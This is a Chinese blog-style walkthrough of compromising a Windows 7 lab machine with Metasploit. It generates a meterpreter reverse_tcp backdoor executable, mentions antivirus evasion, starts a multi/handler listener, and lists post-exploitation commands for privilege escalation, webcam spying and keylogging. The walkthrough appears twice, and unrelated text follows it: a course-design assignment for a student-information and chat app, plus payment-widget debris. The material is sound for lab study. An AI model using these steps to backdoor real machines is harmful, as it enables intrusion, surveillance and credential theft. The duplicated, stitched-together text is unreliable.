Windows7过程总结与后续手段

使用metaploit进行渗透测试Windows7:

设定目标主机为:cn_win7_x86_7601虚拟机,地址为:192.168.0.116;而本地主机就为:192.168.0.149。

   方法步骤一:用Msfpayload直接生成相关的后门程序,如下图。
   sfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.149 x >steup.exe

   方法步骤二:直接就能进入所在的目录并将属性进行修改,换为允许以程序执行文件,详细如下图。
   进入所在目录,修改属性:选择“允许以程序执行文件”,这时候也可以做一些免杀
   方法步骤三:接着打开msfconsole并加载exploit/multi/handler模块并进行设置本地主机,最后就能开始进行监听了,详细情况如下图。
   打开msfconsole,加载exploit/multi/handler模块,设置本地主机;然后开始监听:exploit -z -j :
   方法步骤四:需要能将程序直接拷贝都目标主机中并进行执行。

方法步骤五:以上步骤全部完成后就能通过后门程序反向连接到msf,用msf就能发起第2次的攻击然后使用客户端也就是后门程序就能连接都服务端msf,详细的如下图。

Meterpreter就是metasploit框架中的一个扩展模块,因此的话溢出成功后就能攻击载荷进行使用,一旦攻击载荷在溢出攻击成功后就能再返回一个控制通道,这样就能将它作为攻击载荷成功获得目标系统的一个meterpretershell的链接。
另外,附meterpreter常用命令:
getsystem       #会自动利用各种各样的系统漏洞来进行权限提升
migrate          #进程id进程迁移
background     #把当前的会话设置为背景,需要的时候在启用
getuid           #查看对方正在运行的用户
ps              #列出所有的进程
getpid          #返回运行meterpreter的id号
sysinfo         #产看系统信息和体系结构
shell           #切换到cmd的系统权限方式
exit           #退出shell会话返回meterpreter或终止meterpreter
getdesktop    截取目标主机当前桌面会话窗口
run webcam -p /var/www    #在/var/www目录监控目标主机的摄像头
keylog_recorder   #使用migrate将会话迁移至explorer.exe的进程空间后记录键盘
   sfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.149 x >steup.exe

   方法步骤二:直接就能进入所在的目录并将属性进行修改,换为允许以程序执行文件,详细如下图。
   进入所在目录,修改属性:选择“允许以程序执行文件”,这时候也可以做一些免杀
   方法步骤三:接着打开msfconsole并加载exploit/multi/handler模块并进行设置本地主机,最后就能开始进行监听了,详细情况如下图。
   打开msfconsole,加载exploit/multi/handler模块,设置本地主机;然后开始监听:exploit -z -j :
   方法步骤四:需要能将程序直接拷贝都目标主机中并进行执行。

方法步骤五:以上步骤全部完成后就能通过后门程序反向连接到msf,用msf就能发起第2次的攻击然后使用客户端也就是后门程序就能连接都服务端msf,详细的如下图。

Meterpreter就是metasploit框架中的一个扩展模块,因此的话溢出成功后就能攻击载荷进行使用,一旦攻击载荷在溢出攻击成功后就能再返回一个控制通道,这样就能将它作为攻击载荷成功获得目标系统的一个meterpretershell的链接。
另外,附meterpreter常用命令:
getsystem       #会自动利用各种各样的系统漏洞来进行权限提升
migrate          #进程id进程迁移
background     #把当前的会话设置为背景,需要的时候在启用
getuid           #查看对方正在运行的用户
ps              #列出所有的进程
getpid          #返回运行meterpreter的id号
sysinfo         #产看系统信息和体系结构
shell           #切换到cmd的系统权限方式
exit           #退出shell会话返回meterpreter或终止meterpreter
getdesktop    截取目标主机当前桌面会话窗口
run webcam -p /var/www    #在/var/www目录监控目标主机的摄像头
keylog_recorder   #使用migrate将会话迁移至explorer.exe的进程空间后记录键盘

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Windows程序设计课程设计任务书 课程设计题目1: 设计一个简单的学生信息管理应用程序 一、设计目标与内容: 1. 了解Windows编程的基础知识,掌握MFC应用程序的基本知识; 2. 基本掌握面向对象程序设计的基本思路和方法; 3. 掌握用VC++开发应用程序的的一般步骤和方法; 4. 能够利用所学的基本知识, 设计一个简单的学生信息管理应用程序,具有以下功能:①实现学生信息的存储,可以用文件来实现。②编程实现学生信息的添加、删除、修改、浏览和查询等功能(必须实现的功能)。 二,设计要求: 1. 用VC++进行编码,实现应用程序的功能。注重编码质量,代码要有适当的注释; 2. 采用单文档多视图方式,左边为树视图,右边为列表视图,左边一级节点为中原工学院,二级节点为计算机学院和软件学院,三级节点为计算机学院的三个专业。要求可以动态增加节点。楼便为列表视图,包含学生的学号、性别、姓名各科成绩等。右边也可以实现动态增加 3.当选中节点时,显示对应的学生信息。如当选中”中原工学院”时选中所用的学生信息,选中“计算机学院”时,显示所有计算机学院学生信息 4.采用序列化方式保存和读取学生信息 提交设计报告一份(课程设计任务书、目录、主要的数据结构、设计的基本思路、设计的步骤及主要代码、心得体会、参考文献)。 课程设计题目2: 设计一个简单的聊天应用程序 一、设计目标与内容: 1.了解Windows编程的基础知识,掌握MFC应用程序的基本知识; 2.基本掌握面向对象程序设计的基本思路和方法; 3.掌握用VC++开发应用程序的的一般步骤和方法; 4.能够利用所学的基本知识,设计一个简单的聊天应用程序,包括服务器端和客户端两部分,具有以下功能:①实现局域网内多个人聊天,可以在同一台机器上启动多个客户端。客户端显示所有在线用户的聊天称呼和头像,用户可以通过它选择谈话对象;②用户也可以选择多个动作,设置字体颜色,“悄悄”地对某人说,对信息进行过滤。③服务器端可以“踢”人,并可以防止用户名称的重复。 二,设计要求: 1. 用VC++进行编码,实现应用程序的功能。注重编码质量,代码要有适当的注释; 2. 提交设计报告一份(课程设计任务书、目录、主要的数据结构、设计的基本思路、设计的步骤及主要代码、心得体会、参考文献)。 说明:由于此程序工作量大,可以两人一组,一人做客户端程序,一人做服务器端程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值